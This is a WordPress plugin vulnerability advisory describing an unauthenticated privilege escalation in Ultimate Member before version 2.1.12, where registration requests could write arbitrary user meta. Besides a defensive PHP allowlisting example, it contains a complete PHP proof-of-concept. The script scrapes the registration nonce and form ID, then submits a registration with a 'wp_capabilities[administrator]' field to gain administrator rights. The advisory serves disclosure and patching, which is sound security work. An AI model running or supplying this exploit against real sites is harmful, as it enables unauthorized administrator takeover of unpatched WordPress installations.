WordPress Plugin Vulnerabilities

Ultimate Member < 2.1.12 - Unauthenticated Privilege Escalation via User Meta

Description

An attacker could supply an array parameter for sensitive metadata such as the wp_capabilities user meta, which defines a user's role. During the registration process, the submitted registration details were passed to the update_profile function, and any metadata included in the submission was written to the newly registered user without restriction. A single registration request carrying such a parameter would therefore grant administrator access on registration.
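As an added illustration of the defensive principle behind this issue, the following PHP helper allowlists registration fields before anything reaches user meta. It is not the plugin's code and not the fix shipped in 2.1.12; the function names, the "-<form_id>" suffix convention and the use of the table prefix to build the capability key are assumptions.

```php
<?php
// Added example (not Ultimate Member code): only fields the form defines,
// and only scalar values, may flow from a registration POST into user meta.

/**
 * Meta keys that must never be settable from a self-service form.
 * WordPress stores roles/capabilities under "{table prefix}capabilities"
 * and the legacy "{table prefix}user_level", so the prefix is passed in.
 */
function protected_meta_keys(string $prefix): array {
    return [
        $prefix . 'capabilities',
        $prefix . 'user_level',
    ];
}

/**
 * Returns ['kept' => [...], 'dropped' => [...]].
 * Keys are normalised by stripping an assumed "-<form_id>" suffix, then
 * rejected if protected, not in the form's allowlist, or non-scalar.
 */
function filter_registration(array $submitted, array $allowed, string $prefix): array {
    $protected = protected_meta_keys($prefix);
    $kept = [];
    $dropped = [];
    foreach ($submitted as $key => $value) {
        $base = preg_replace('/-\d+$/', '', (string) $key);
        if (in_array($base, $protected, true) || !in_array($base, $allowed, true)) {
            $dropped[] = $key;          // unknown or protected key
            continue;
        }
        if (!is_scalar($value)) {        // e.g. wp_capabilities[administrator]
            $dropped[] = $key;
            continue;
        }
        $kept[$base] = $value;
    }
    return ['kept' => $kept, 'dropped' => $dropped];
}

// Constructed sample: a registration submission with an injected meta key.
$sample = [
    'user_login-123'  => 'newuser',
    'user_email-123'  => 'newuser@example.com',
    'wp_capabilities' => ['administrator' => ''],
    'form_id'         => '123',
];
$form_fields = ['user_login', 'user_email', 'first_name', 'last_name'];
print_r(filter_registration($sample, $form_fields, 'wp_'));
// 'kept' holds user_login and user_email; 'dropped' lists wp_capabilities and form_id.
```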

Proof of Concept

<?php

// Settings
$wp_url = $argv[1];
$username = $argv[2];
$name = $argv[3];
$lastname = $argv[4];
$email = $argv[5];
$um_role = $argv[6];

// Pull the Nonce
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $wp_url . '/register');
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
$content = curl_exec($ch);
curl_close($ch);

preg_match('/_wpnonce"\svalue="([^"]+)"/', $content, $matches);
$nonce = $matches[1];

// Pull the form_id
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $wp_url . '/register');
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
$content = curl_exec($ch);
curl_close($ch);

preg_match('/id=\"form_id_([^"]+)"/', $content, $matches);
$form_id = $matches[1];

// Update Settings
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $wp_url . '/register');
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, [
    'user_login-' . $form_id => $username,
    'first_name-'. $form_id => $name,
    'last_name-' . $form_id => $lastname,
    'user_email-' . $form_id => $email,
    'user_password-' . $form_id => 'StrongPassword123!',
    'confirm_user_password-' . $form_id => 'StrongPassword123!',
    'wp_capabilities[administrator]' => '',
    'form_id' => $form_id,
    'timestamp' => '1603399250',
    'um_request' => '',
    '_wpnonce' => $nonce,
    '_wp_http_referer' => 'register'

]);

$output = curl_exec($ch);
curl_close($ch);
print_r($output);

?>

Fixed in 2.1.12

Classification

Miscellaneous

Original Researcher
Chloe Chamberland
Submitter
Chloe Chamberland
Verified
No

Timeline

Publicly Published
2020-11-09
Added
2020-11-09
Last Updated
2021-01-06